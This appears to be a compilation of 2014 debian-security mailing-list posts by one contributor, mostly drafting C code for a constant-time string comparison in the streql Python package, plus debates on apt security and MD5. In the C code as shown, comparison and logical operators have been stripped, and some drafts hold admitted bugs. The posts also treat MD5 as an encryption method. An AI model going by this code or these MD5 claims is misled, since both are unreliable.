Re: 9n216.13.107.82

[Joel Rees]

Can I suggest to those who responded to these that kneejerk reactions
aren't useful?

And that, if you really don't understand the nature of these, there is
quite a lot of information to be gained by looking at the raw source
and using a search site (instead of jumping to the urls to see what
they are)?

FTR, we assume that someone was spoofing luciano's email address,
either randomly or as an attack on his character.

-
Joel Rees

I'm imagining I'm a novelist:
http://joel-rees-economics.blogspot.com/2016/06/econ101-novel-toc.html

Re: streql - Constant-time string comparison

[Joel Rees]

On Sat, Nov 1, 2014 at 4:49 PM, Riley Baird
bm-2cvqnduybau5do2dfjtrn7zbaj246s4...@bitmessage.ch wrote:
 On 31/10/14 09:43, Joel Rees wrote:
 [...]
 This is a good way of doing the string comparison. However, it would
 seem that upstream isn't really interested in hiding the length of the
 strings, and doing so would only provide minimal security benefits.

They're kind of right, I'm discovering.

 Would you be willing to sponsor the upstream streql,

Not sure what you mean there.

 or do you think
 that this version should be packaged instead after being modified for
 Python?

No. I'm still playing with the concepts (Current state of things
below.) and realizing several things.

Probably, the best solution for a constant-time compare is to
pre-zero-fill the buffers and do binary compares (memcmp()) on the
entire buffers. That means that these routines are a bit superfluous
anyway.

My current results:

---
/* Near-constant run time string/memory compare, with test frame.
** by Joel Rees,
** derived from work by Peter Scott, Riley Baird, et. al., see
** https://lists.debian.org/debian-security/2014/10/msg00060.html
** https://github.com/PeterScott/streql
**
** Use of those parts original with Joel Rees allowed specifically under
** the Apache License version 2.0:
** http://opensource.org/licenses/Apache-2.0 ,
** or the Academic Free License v. 2.1
** http://opensource.org/licenses/AFL-3.0 ,
** or the GPL v. 2.0, 3.0 or later:
** http://www.gnu.org/copyleft/gpl.html
**
** Permission granted in advance
** for the Python Software Foundation to license or re-license
** any source code copyrights and/or patent rights held in such parts
by Joel Rees
** as part of Python Software Foundation software distributions and
publications.
**
** No claims or licensing assertions made concerning those parts not
original with Joel Rees.
*/

#include string.h
#include stdio.h
#include stdlib.h


/* dbg */ static int gcount = 0;

// The core function: test two regions of memory for bytewise equality
with near constant time.
// If cmplength is less than min( xlen, ylen ), comparison is incomplete.
// Lengths should be signed to make conditionals more balanced.
// Maximum string length is greater than 2^30 for 32 bit ints.
// Impervious to embedded NUL characters.
static int equals_internal_constimebin(
const char *x, int xlen,
const char *y, int ylen,
int cmplength) {

  int result = 0;

/* dbg */ gcount = 0;

  while ( --cmplength = 0 ) {
char xtemp;
char ytemp;

/* Using unsigned lengths here would induce unbalanced conditionals:
** unsigned int xlen;
** if ( xlen  0 ) {
**   xtemp = *x++;
**   --xlen;
** }
** else {
**   xtemp = 0;// much quicker than indexed load and counter decrement
** }
** While signed lengths might be a problem with 16 bit ints,
** you really aren't going to be comparing strings  2^31 bytes
with this function.
*/

xtemp = ( --xlen = 0 ) ? *x++ : 0;
ytemp = ( --ylen = 0 ) ? *y++ : 0;

/* dbg */++gcount;
result |= xtemp ^ ytemp;
/* dbg  printf( %c(%d):%c(%d) =%d@%d\n, xtemp, xlen, ytemp, ylen,
result, gcount ); */
  }

  return (xlen == ylen)  (result == 0);
}


#define MAX_PASSWORD_LENGTH32

/* Fails silently on passwords longer than MAX_PASSWORD_LENGTH bytes.
// Note that using strlen() on the parameters will still induce some
timing leaks.
// DO NOT use this macro in real code.
*/
#define Mequals_internal_password( guess, key )\
equals_internal_constimebin( \
guess, strlen( guess ), \
key, strlen( key ), MAX_PASSWORD_LENGTH )


#define DEFAULT_PASSPHRASE_LENGTH64

/* Constant to default length, then dependent on length of guess.
// See above on use of strlen().
*/
static int equals_internal_passphrase( const char *guess, const char *key ) {

  int guesslen = strlen( guess );
  int keylen = strlen( key );
  int complen = ( guesslen  DEFAULT_PASSPHRASE_LENGTH ) ? guesslen :
DEFAULT_PASSPHRASE_LENGTH;

  return equals_internal_constimebin( guess, guesslen, key, keylen, complen );
}


// The core function: test two regions of memory for bytewise equality
with near constant time.
// If cmplength is less than length of x or y, comparison is incomplete.
// Lengths should be signed to make conditionals more balanced.
// Maximum string length is  2^31 for 32 bit ints.
// Sensitivity to NULs allows use without strlen().
static int equals_internal_constime(
const char *x,
const char *y,
int cmplength) {

  int result = 0;
  int xstopped = 0;
  int ystopped = 0;

/* dbg */ gcount = 0;

  while ( --cmplength = 0 ) {
char xtemp = xstopped ? 0 : *x++;
char ytemp = ystopped ? 0 : *y++;

/* dbg */++gcount;
result |= xtemp ^ ytemp;
if ( xtemp == '\0' ) xstopped = cmplength;
if ( ytemp == '\0' ) ystopped = cmplength;
/* dbg  printf( %c:%c =%d@%d (stopped x:%d y:%d)\n, xtemp, ytemp,
result, gcount, xstopped, ystopped ); */
  }

  return (xstopped == ystopped

Re: streql - Constant-time string comparison

[Joel Rees]

On Sun, Nov 2, 2014 at 12:39 AM, Leslie S Satenstein
lsatenst...@yahoo.com wrote:
 Please explain from where or how you get xlen and ylen.

 Do you make a complete pass through the string looking for a NULL character?
 If you do, then you are going to check your string once for the length, and
 once for the matching.

The original source:

https://github.com/PeterScott/streql/blob/master/streql.c

Note this line:

if (!PyArg_ParseTuple(args, et#et#, utf8, x, xlen, utf8, y,
ylen)) return NULL;

Riley is under the impression that Python strings are counted, rather
than NUL-terminated. Given the answers to

http://stackoverflow.com/questions/237128/is-there-a-reason-python-strings-dont-have-a-string-length-method

I'm pretty sure he's right.

 [...]

-- 
Joel Rees


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/caar43imysc4az08imby9i77iis+j8qnxz+mo9ywbricrszr...@mail.gmail.com

Re: streql - Constant-time string comparison

[Joel Rees]

On Sun, Nov 2, 2014 at 1:21 AM, Jack j...@jackpot.uk.net wrote:
 On 01/11/2014 16:07, Joel Rees wrote:

 Riley is under the impression that Python strings are counted,
 rather than NUL-terminated. Given the answers to

 http://stackoverflow.com/questions/237128/is-there-a-reason-python-strings-dont-have-a-string-length-method

  I'm pretty sure he's right.

 [...]

 Why is this thread being pursued in Debian Security?

Because I don't feel like signing up on github just to talk about
trying to improve a project intended to add secure string comparison
methods to python, which project has someone requesting a sponsor in
debian.

 This mailing list is for security announcements.

Oh?

Then explain these:

https://lists.debian.org/debian-security/2014/09/threads.html

 All Debian users are
 encouraged to subscribe, so that they know about the latest threats and
 updates.

Perhaps you're thinking about this list:

https://lists.debian.org/debian-security-announce/2014/threads.html

 It is not reasonable to use this list as a forum for discussing a Python
 string-comparison routine.

If we weren't talking about security related issues in Python string
handling, you'd be right.

 Can you please take your discussion somewhere
 else?

Well, I'm not a dev, so I guess I don't belong here. I've said enough,
I'm sure that if someone decides to sponsor the project they can work
out the remaining details.

Except for one more thing, I guess. That will be my last post here.

-- 
Joel Rees

Be careful when you look at conspiracy.
Look first in your own heart,
and ask yourself if you are not your own worst enemy.
Arm yourself with knowledge of yourself, as well.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/CAAr43iN4cowP8RN9+B2Fjhd8vab0i78f5kw9rq=nmk5yyam...@mail.gmail.com

Re: streql - Constant-time string comparison

[Joel Rees]

On Sat, Nov 1, 2014 at 9:56 PM, Joel Rees joel.r...@gmail.com wrote:
 [...]
 Probably, the best solution for a constant-time compare is to
 pre-zero-fill the buffers and do binary compares (memcmp()) on the
 entire buffers. That means that these routines are a bit superfluous
 anyway.

I was distracted when I wrote that.

Constant width buffers, yes.

memcmp(), of course not.

-- 
Joel Rees

Be careful when you look at conspiracy.
Look first in your own heart,
and ask yourself if you are not your own worst enemy.
Arm yourself with knowledge of yourself, as well.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/CAAr43iOF4EgyZV-BT_oNPPxAo20tV73dqnSddB6=3c2w+4l...@mail.gmail.com

Re: streql - Constant-time string comparison

[Joel Rees]

2014/10/30 16:52 Nicolas Rachinsky deb-securit...@ml.turing-complete.org
:

 * Joel Rees joel.r...@gmail.com [2014-10-30 08:38 +0900]:
  -
  // The core function: test two regions of memory for bytewise equality
  with constant time.
  // If cmplength is less than min( xlen, ylen ), comparison is
incomplete.
  static int equals_internal_constime(
  const char *x, unsigned int xlen,
  const char *y, unsigned int ylen,
  int cmplength) {
 
int result = 0;
 
while ( --cmplength = 0 ) {
  char xtemp = 0;
  char ytemp = 0;
 
  if ( --xlen = 0 ) xtemp = *x++;
  if ( --ylen = 0 ) ytemp = *y++;
 
  result |= xtemp ^ ytemp;
}
 
return (xlen == ylen)  (result == 0);
  }
  -

 Perhaps I am missing the obvious, but 0-1 ist UINT_MAX, which is
 bigger than zero.

How embarrassing. One test would have caught that. Okay, use postdec mode
and greater than instead of greater than or equal. Or something similar.

And I should code instead of theorize.

 And if this would work, the runtime of the loop's body would depend on
 whether the assignments are executed or not.

It's the difference between having an indexed load or not. I think we can
assume the strings will be in cache after the first access.

Okay, don't initialize the local copy variables, use a two-way branch. And
you'll still have some slop because clearing a variable is quicker than
loading indexed.

Anyway, it's better than just dropping out of the loop.

(I have to get some way to write useful code on this lousy tablet.)

I'll be on the train for about an hour. You're welcome to fix the code
while I'm off-line.

--
Joel Rees

Computer memory is just fancy paper,
CPUs just fancy pens.
All is a stream of text
flowing from the past into the future.

Re: streql - Constant-time string comparison

[Joel Rees]

Here's the result of my work to this point:

---
/* Near-constant run time string/memory compare, with test frame.
** by Joel Rees,
** derived from work by Peter Scott, Riley Baird, et. al., see
** https://lists.debian.org/debian-security/2014/10/msg00060.html
** https://github.com/PeterScott/streql
**
** Use allowed under GPL v. 3, see
** http://www.gnu.org/copyleft/gpl.html
*/

#include string.h
#include stdio.h
#include stdlib.h


/* dbg */ static int gcount = 0;

// The core function: test two regions of memory for bytewise equality
with constant time.
// If cmplength is less than min( xlen, ylen ), comparison is incomplete.
// Lengths should be signed to make conditionals more balanced.
static int equals_internal_constime(
const char *x, int xlen,
const char *y, int ylen,
int cmplength) {

  int result = 0;

  while ( --cmplength = 0 ) {
char xtemp;
char ytemp;

/* Using unsigned lengths here would induce unbalanced conditionals:
** unsigned int xlen;
** if ( xlen  0 ) {
**   xtemp = *x++;
**   --xlen;
** }
** else {
**   xtemp = 0;
** }
** While this might be a problem with 16 bit ints,
** you really aren't going to be comparing strings  2^31 bytes
with this function.
*/
xtemp = ( --xlen = 0 ) ? *x++ : 0;
ytemp = ( --ylen = 0 ) ? *y++ : 0;

/* dbg */++gcount;
result |= xtemp ^ ytemp;
/* dbg  printf( %c(%d):%c(%d) =%d@%d\n, xtemp, xlen, ytemp, ylen,
result, gcount ); */
  }

  return (xlen == ylen)  (result == 0);
}


int main( int argc, char * argv[] ) {

char * left, * right;
int max = 32;
int result = 0;

if ( argc  2 ) {
  left = argv[ 1 ];
  right = argv[ 2 ];
  if ( argc  3 ) max = strtol( argv[ 3 ], NULL, 0 );
  gcount = 0;
  result = equals_internal_constime( left, strlen( left ), right,
strlen( right ), max );
  printf( result: %d, strcmp: %d, count: %d\n, result, strcmp(
left, right ), gcount );
  if ( result != ( strcmp( left, right ) == 0 ) ) {
fputs( *** failed ***\n, stdout );
  }
}


return EXIT_SUCCESS;
}
---

Note the change to signed lengths and the reasoning.

--
Joel Rees


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/CAAr43iNAJu-tMpvJ3nh4HTPJK=dy1td0gp-cyzza9de49fe...@mail.gmail.com

Re: streql - Constant-time string comparison

[Joel Rees]

I gotta quit coding when I should be asleep.

On Fri, Oct 31, 2014 at 12:38 AM, Joel Rees joel.r...@gmail.com wrote:
 Here's the result of my work to this point:

 ---
 /* Near-constant run time string/memory compare, with test frame.
 ** by Joel Rees,
 ** derived from work by Peter Scott, Riley Baird, et. al., see
 ** https://lists.debian.org/debian-security/2014/10/msg00060.html
 ** https://github.com/PeterScott/streql
 **
 ** Use allowed under GPL v. 3, see
 ** http://www.gnu.org/copyleft/gpl.html

Correct that to:
** Use of those parts original with Joel Rees allowed specifically under
** the Apache License version 2.0:
** http://opensource.org/licenses/Apache-2.0 ,
** or the Academic Free License v. 2.1
** http://opensource.org/licenses/AFL-3.0 ,
** or the GPL v. 2.0, 3.0 or later:
** http://www.gnu.org/copyleft/gpl.html
**
** Permission granted in advance
** for the Python Software Foundation to license or re-license
** any source code copyrights and/or patent rights held in such parts
by Joel Rees
** as part of Python Software Foundation publications and distributions.
**
** No claims or licensing assertions made concerning those parts not
original with Joel Rees.

 */

 #include string.h
 #include stdio.h
 #include stdlib.h


 /* dbg */ static int gcount = 0;

 // The core function: test two regions of memory for bytewise equality
 with constant time.
 // If cmplength is less than min( xlen, ylen ), comparison is incomplete.
 // Lengths should be signed to make conditionals more balanced.
 static int equals_internal_constime(
 const char *x, int xlen,
 const char *y, int ylen,
 int cmplength) {

   int result = 0;

   while ( --cmplength = 0 ) {
 char xtemp;
 char ytemp;

 /* Using unsigned lengths here would induce unbalanced conditionals:
 ** unsigned int xlen;
 ** if ( xlen  0 ) {
 **   xtemp = *x++;
 **   --xlen;
 ** }
 ** else {
 **   xtemp = 0;
 ** }
 ** While this might be a problem with 16 bit ints,
 ** you really aren't going to be comparing strings  2^31 bytes
 with this function.
 */
 xtemp = ( --xlen = 0 ) ? *x++ : 0;
 ytemp = ( --ylen = 0 ) ? *y++ : 0;

 /* dbg */++gcount;
 result |= xtemp ^ ytemp;
 /* dbg  printf( %c(%d):%c(%d) =%d@%d\n, xtemp, xlen, ytemp, ylen,
 result, gcount ); */
   }

   return (xlen == ylen)  (result == 0);
 }


 int main( int argc, char * argv[] ) {

 char * left, * right;
 int max = 32;
 int result = 0;

 if ( argc  2 ) {
   left = argv[ 1 ];
   right = argv[ 2 ];
   if ( argc  3 ) max = strtol( argv[ 3 ], NULL, 0 );
   gcount = 0;
   result = equals_internal_constime( left, strlen( left ), right,
 strlen( right ), max );
   printf( result: %d, strcmp: %d, count: %d\n, result, strcmp(
 left, right ), gcount );
   if ( result != ( strcmp( left, right ) == 0 ) ) {
 fputs( *** failed ***\n, stdout );
   }
 }


 return EXIT_SUCCESS;
 }
 ---

 Note the change to signed lengths and the reasoning.

 --
 Joel Rees

-- 
Joel Rees

Somebody should take the Berne Convention out behind the barn and burn
it with the other trash.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/caar43ipovow_uzwv2gpgtjqfgridax5kxnyjnfdqvp+4sqt...@mail.gmail.com

Re: streql - Constant-time string comparison

[Joel Rees]

2014/10/29 4:59 Riley Baird 
bm-2cvqnduybau5do2dfjtrn7zbaj246s4...@bitmessage.ch:

 On 29/10/14 00:20, Joel Rees wrote:
  On Tue, Oct 28, 2014 at 12:08 PM, Riley Baird
  bm-2cvqnduybau5do2dfjtrn7zbaj246s4...@bitmessage.ch wrote:
  Dear debian-security,
 
  I am looking for a sponsor for my package streql.
 
  In Python, the code for testing the equality of strings is susceptible
  to a timing side channel attack. The package 'streql' provides a
  function for comparing strings of equal length in equal time,
regardless
  of the content of the strings.
 
  * Package name: streql
Version : 3.0.2-1
Upstream Author : Peter Scott pe...@cueup.com
  * URL :https://github.com/PeterScott/streql
  * License : Apache 2.0
Section : python
 
  It builds those binary packages:
 
  python-streql - Constant-time string comparison (Python 2)
  python3-streql - Constant-time string comparison (Python 3)
  pypy-streql - Constant-time string comparison (PyPy)
 
  To access further information about this package, please visit the
following
  URL:
 
 http://mentors.debian.net/package/streql
 
  Alternatively, one can download the package with dget using this
command:
 
  dget -x
 http://mentors.debian.net/debian/pool/main/s/streql/streql_3.0.2-1.dsc
 
  Changes since last upload:
 
  * Initial release (Closes: #764443)
 
  Regards,
  Riley Baird
 
  Let me try this suggestion again:
 
  ---
  // The core function: test two regions of memory for bytewise equality.
  static int equals_internal(const char *x, unsigned int xlen, const
  char *y, unsigned int ylen) {
 
  int minlen = ( xlen  ylen ) ? ylen : xlen;
  int i, result = 0;
 
  for (i = 0; i  minlen; i++) result |= x[i] ^ y[i];
 
  return ( xlen == ylen )  ( result == 0 );
  ---
 
  I haven't tested it, but I think the corner case I'm thinking about is
  fairly clear.

 As far as I can tell, your code ensures that even if the strings are of
 different length, an equality calculation should be performed anyway,
 however returning 0, on the grounds that this would make it more
 difficult for an attacker to know that the two strings entered were of
 different lengths. Is this right?


Yeah.

It still leaks length information, but not as obviously.

You could add a busy loop to push the leak to the other side of the sweep.

You could even play games with the busy loop to randomly extend it beyond
the place it would naturally terminate, just to reduce the incentive to
look. (Making sure your pseudo-random selection code is not data dependent,
of course.)

You could change the semantics of the API to allow making the execution
time depend on the length of attacker's guess.

Of course, it's not really hard to get true constant compare times, and
that's what I think I'd aim at.

--
Joel Rees

Computer memory is just fancy paper,
CPUs just fancy pens.
All is a stream of text
flowing from the past into the future.

Re: streql - Constant-time string comparison

[Joel Rees]

On Thu, Oct 30, 2014 at 4:58 AM, Riley Baird
bm-2cvqnduybau5do2dfjtrn7zbaj246s4...@bitmessage.ch wrote:
 On 29/10/14 19:55, Richard van den Berg wrote:
 On 28-10-14 20:59 , Riley Baird wrote:
 As far as I can tell, your code ensures that even if the strings are of
 different length, an equality calculation should be performed anyway,
 however returning 0, on the grounds that this would make it more
 difficult for an attacker to know that the two strings entered were of
 different lengths. Is this right?

 Pardon my ignorance, but how much more difficult does it actually become
 to determine the two inputs are of different length? In the original the
 function returns right away if xlen != ylen. If the attacker can control
 one of the inputs (say x), the change proposed by Joel will cause the
 time of the compare to increment when xlen in increased until xlen ==
 ylen. If this can be observed with enough precision the same objective
 can be achieved.

 Good point. Perhaps this could be fixed by,

 origleny=len(y)

 while len(x) = len(y):
 y += '0'

 result = i = 0
 for i in xrange(len(x)):
 result |= ord(x[i]) ^ ord(y[i])
 return result == 0 and len(y) == origleny

 This way, the time taken to complete the function will increase even
 after xlen = ylen

 However, with this I'm concerned that the 'while' loop will take up too
 much time, thus still allowing an attacker to see when the string
 lengths become equal. Is there a quicker way to append zeros to a string
 such that it is equal in length to the other string?

Well, allocation of a string would tend to make the run time somewhat
arbitrary, but whether it would mask the length or not is kind of hard
to predict. Considering that the attack uses statistics, it's not hard
to look for double peaks.

I had a sort of similar idea, using a pair of local buffers, cycling
the string through the buffers, and got workable code. But I realized
I was just working too hard. A one byte buffer is plenty, and
simplifies the loop. Seriously simplifies the loop. (I think. Still
haven't really tested it or looked for corner cases.)

I'm going to spend some time testing the following today and tomorrow:

-
// The core function: test two regions of memory for bytewise equality
with constant time.
// If cmplength is less than min( xlen, ylen ), comparison is incomplete.
static int equals_internal_constime(
const char *x, unsigned int xlen,
const char *y, unsigned int ylen,
int cmplength) {

  int result = 0;

  while ( --cmplength = 0 ) {
char xtemp = 0;
char ytemp = 0;

if ( --xlen = 0 ) xtemp = *x++;
if ( --ylen = 0 ) ytemp = *y++;

result |= xtemp ^ ytemp;
  }

  return (xlen == ylen)  (result == 0);
}
-

Picking the minimum length for cmplength when you call it would be the
same as I posted before. Picking the maximum length would bias the
execution time to the longer of the pair. Either way, sequencing
through lengths of guesses would (using statistical methods) reveal a
point where the time goes from constant to variable, as Richard notes
above.

If you can set an absolute max cmplength, you can always call it with
the absolute max and get strictly constant time compares. (Or maybe
use a manifest constant for cmplength.) For instance, for an API
dedicated to passwords, if you know that all passwords are 31 bytes
or less, you can pass 31 for cmplength on the call.

But when the same API could be used for passwords or 2048 bit keys,
you'd need to pass 256 for cmplength, which might be too long a wait
for some things. That's why I suggested the possibility of needing to
change the API.

Another possibility is to use the greater of xlen, ylen, and cmplength
in this function, which would avoid the problem of incomplete compares
I put in the comments, and would allow one to set a length, beyond
which we would not care if the length leaked. (20 or 32 might be
reasonable.) This could be done without changing the API from the
Python side.

A third possibility might be to offer an API where we call the x
parameter guess and the y parameter actual_key, and always set the
cmplength parameter to the guess length. That way, the time would
always be dependent on the attacker's guess (assuming the caller
function treated the parameters correctly).

Completely separate topic, but with just a little more effort and care
in the conditional paths, that could even be made an ordered compare,
by noting the difference of the first pair of bytes that differ.

-- 
Joel Rees

Be careful when you see conspiracy.
Look first in your own heart,
and ask yourself if you are not your own worst enemy.
Arm yourself with knowledge of yourself.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/CAAr43iN+tV3L=xqsp_ukan+kc4ywrj8-mf_sfktukzeh4-5...@mail.gmail.com

Re: streql - Constant-time string comparison

[Joel Rees]

On Tue, Oct 28, 2014 at 12:08 PM, Riley Baird
bm-2cvqnduybau5do2dfjtrn7zbaj246s4...@bitmessage.ch wrote:
 Dear debian-security,

 I am looking for a sponsor for my package streql.

 In Python, the code for testing the equality of strings is susceptible
 to a timing side channel attack. The package 'streql' provides a
 function for comparing strings of equal length in equal time, regardless
 of the content of the strings.

 * Package name: streql
   Version : 3.0.2-1
   Upstream Author : Peter Scott pe...@cueup.com
 * URL : https://github.com/PeterScott/streql
 * License : Apache 2.0
   Section : python

 It builds those binary packages:

 python-streql - Constant-time string comparison (Python 2)
 python3-streql - Constant-time string comparison (Python 3)
 pypy-streql - Constant-time string comparison (PyPy)

 To access further information about this package, please visit the following
 URL:

 http://mentors.debian.net/package/streql

 Alternatively, one can download the package with dget using this command:

 dget -x
 http://mentors.debian.net/debian/pool/main/s/streql/streql_3.0.2-1.dsc

 Changes since last upload:

 * Initial release (Closes: #764443)

 Regards,
 Riley Baird

I have a suggestion which I

Joel Rees

Be careful when you see conspiracy.
Look first in your own heart,
and ask yourself if you are not your own worst enemy.
Arm yourself with knowledge of yourself.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/CAAr43iN0iYPYOVSebhUJ9d4b7fNOVPaFSycKqQgORk=bu7c...@mail.gmail.com

Re: streql - Constant-time string comparison

[Joel Rees]

On Tue, Oct 28, 2014 at 12:08 PM, Riley Baird
bm-2cvqnduybau5do2dfjtrn7zbaj246s4...@bitmessage.ch wrote:
 Dear debian-security,

 I am looking for a sponsor for my package streql.

 In Python, the code for testing the equality of strings is susceptible
 to a timing side channel attack. The package 'streql' provides a
 function for comparing strings of equal length in equal time, regardless
 of the content of the strings.

 * Package name: streql
   Version : 3.0.2-1
   Upstream Author : Peter Scott pe...@cueup.com
 * URL : https://github.com/PeterScott/streql
 * License : Apache 2.0
   Section : python

 It builds those binary packages:

 python-streql - Constant-time string comparison (Python 2)
 python3-streql - Constant-time string comparison (Python 3)
 pypy-streql - Constant-time string comparison (PyPy)

 To access further information about this package, please visit the following
 URL:

 http://mentors.debian.net/package/streql

 Alternatively, one can download the package with dget using this command:

 dget -x
 http://mentors.debian.net/debian/pool/main/s/streql/streql_3.0.2-1.dsc

 Changes since last upload:

 * Initial release (Closes: #764443)

 Regards,
 Riley Baird

Let me try this suggestion again:

---
// The core function: test two regions of memory for bytewise equality.
static int equals_internal(const char *x, unsigned int xlen, const
char *y, unsigned int ylen) {

int minlen = ( xlen  ylen ) ? ylen : xlen;
int i, result = 0;

for (i = 0; i  minlen; i++) result |= x[i] ^ y[i];

return ( xlen == ylen )  ( result == 0 );
---

I haven't tested it, but I think the corner case I'm thinking about is
fairly clear.

-- 
Joel Rees


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/CAAr43iMStL_-8iyGCre5fr76b7WH5Y12n=eaxlk4yqhzhl9...@mail.gmail.com

Re: concrete steps for improving apt downloading security and privacy

[Joel Rees]

A little context?

On Thu, Jul 17, 2014 at 1:26 AM, Hans-Christoph Steiner h...@at.or.at wrote:
[...]
 * TAILS is a Debian-based live CD
 * the core system image by definition cannot be modified (live CD)
 * it has a feature for persistent storage of files on a USB thumb drive

What happens when you put your live-image CD or USB in a box whose
boot ROM or BIOS ROM has been overwritten through some vulnerability
and now contains a hook to a backdoor?

I'm not going to say that the whole idea of a live-image system is
full of holes, but I personally do not trust anything important to any
of the live images I use from time to time on hardware I don't
control, except for the live CDs I use for repairing systems that have
gone belly-up.

I have, in the past, brought live USBs home from work and booted them
on my home hardware. I don't do that any more. (I'd have to mount the
USB on a running system at home and verify the parts of the file
system that shouldn't change.)

 * it also can save apt cache/lib to that persistent store
 * it will automatically install packages on boot from that store
 * mostly people use TAILS in online mode
 * there is a fully offline mode in development
 * offline TAILS cannot verify the packages if apt lists are  2 weeks

Yes it can.

 * updating the apt cache/lib is painful on an offline machine

Don't turn your nose up at wrappers. Lots of very useful stuff around
that is just wrapping something else. Quite stable, if the wrapper
does its job fully.

 * an offline machine's threat model is drastically simpler

I disagree with that, as you see.

 On top of all that, each update increases risk of compromise on offline
 machines because each new update provides a vector to run a script or
 introduce new code that otherwise does not exist (no network!).

I suggest looking at the reasons for that again.

  And any
 decent attacker with physical access to the machine will always get in.

Isn't this a red herring?

 Other people want to be able to directly download .deb packages and have then
 verified as part of the install process.  This is not my primary concern, but
 I do think it is a valid one.  It would also be addressed by fully support of
 dpkg-sig.

 .hc


I understand the hesitation. Having individual packages signed is a
good lead to a false sense of security.

One point I strongly suggest considering is, for example, that
firefox, direct from mozilla.org, on stock debian, is more likely to
have vulnerabilities than firefox (iceweasel) loaded from the debian
packages archives.

-- 
Joel Rees

Computer memory is just fancy paper.
The CPU and IO devices are just fancy pens.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/caar43im5bnalp1fny9j63cqezizpf0uxgm-txufasc-lj6m...@mail.gmail.com

Re: concrete steps for improving apt downloading security and privacy

[Joel Rees]

On Sun, Jul 13, 2014 at 1:28 PM, Noah Meyerhans no...@debian.org wrote:
 On Sun, Jul 13, 2014 at 08:35:56AM +0900, Joel Rees wrote:
 MD5 has been broken for a small number of applications. Its status is
 questionable for the rest, but if we want to help break it completely,
 let's get all the distros that insist on still using MD5 to use it,
 not just for signing, but for encrypting their distribution images.

 The point that you miss is that a chosen plaintext attack is not
 dependent on the secret key in use.

If I stand on my head does that make more sense?

Nope. Doesn't.

 It's an attack against the algorithm
 itself.

Looking at it sideways doesn't help, either.

 If we sign publically available data (be it Debian packages, CD
 images, or this email) with a given key, we really aren't giving our
 adversaries anything that they can't create for themselves.

Sure we are. We are providing them instances of a different experiment
set than any they are likely do generate themselves. Unless we use
keys generated by some algorithm they might use to generate data.

And we are also giving them the use of our servers.

 Keys are
 cheap to generate.

Keys that are cheap to generate should not be used on live data.

 If an adversary wants to perform chosen plaintext
 analysis, they can do so today with their own keys and with all the
 common public datasets they want.

And generating/managing their own data is a time cost. Moreover, if
they fail to use some arbitrary algorithm, their choice of key is
hit-and-miss, mostly miss. But if they use some algorithm, they are
subject to the problems of brute-forcing against a large attack
domain.

 Getting all the distros that insist
 on still using MD5 to use it, not just for signing, but for encrypting
 their distribution images won't change anything.

So, when you want to do a survey of most popular TV shows, you just
generate your own survey results and don't bother to define and canvas
an audience?

You do understand that the most effective attacks against the
algorithms are statistical in nature?

 (Not to mention that
 it shows a fundamental misunderstanding of what a digest algorithm like
 md5 actually is.)

You like to work backwards, trying to generate data from a hash, I suppose?

 noah

-- 
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/caar43iobz5utdg2zdaglm6yszkhnjeo+1fw-whjzpp5smj2...@mail.gmail.com

Re: concrete steps for improving apt downloading security and privacy

[Joel Rees]

On Sun, Jul 13, 2014 at 5:04 AM, Jann Horn j...@thejh.net wrote:
 On Mon, Jul 07, 2014 at 08:09:14PM +0900, Joel Rees wrote:
 But again, that's only half the story. When you send a kernel image
 encrypted, they have the plaintext and the crypt, and the thing is
 large and hard. This is the kind of data that can be used to
 completely break an entire encryption algorithm.

 When you say break an entire encryption algorithm, do you mean
 find the key or really break the whole algorithm?

Both, of course.

 If you mean break the whole algorithm and gain the ability to
 convert ciphertexts to plaintexts no matter what key was used,
 please consider that they could just encrypt a lot of data with
 random keys themselves instead of collecting it from the internet.

 If you mean find the key: So what? You're talking about session
 keys used in the TLS connection, right? Even if there was the kind
 of attack you're thinking about, it would only allow an attacker to
 gain access to the connection that he would be able to MITM anyway
 without the TLS layer.

What are the encryption methods that underlie the current
implementations of TLS?

What were the previous methods?

Why did they have to be changed? What did the research that induced
the change use in getting the results they got?

Have the researchers given up?

No? What kinds of data do they use?

Note that we still don't have a publicly known general attack against
MD5 encryption for arbitrary plaintexts.

MD5 has been broken for a small number of applications. Its status is
questionable for the rest, but if we want to help break it completely,
let's get all the distros that insist on still using MD5 to use it,
not just for signing, but for encrypting their distribution images.

I'm not talking about suddenly facing the end of the world as we know
it tomorrow. I'm talking about choosing to push the time when we have
to shift encryption methods again a few years forward by casually
providing more data for research.

-- 
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/CAAr43iN=fguxegEdr16jr37tuE8osHDDPRdHZicDfZU=dyp...@mail.gmail.com

could we maybe serve checksums TLS on some mirrors? (was Re: concrete steps for improving apt downloading security and privacy)

[Joel Rees]

On Thu, Jul 10, 2014 at 9:29 AM, Kitty Cat realizar.la@gmail.com wrote:
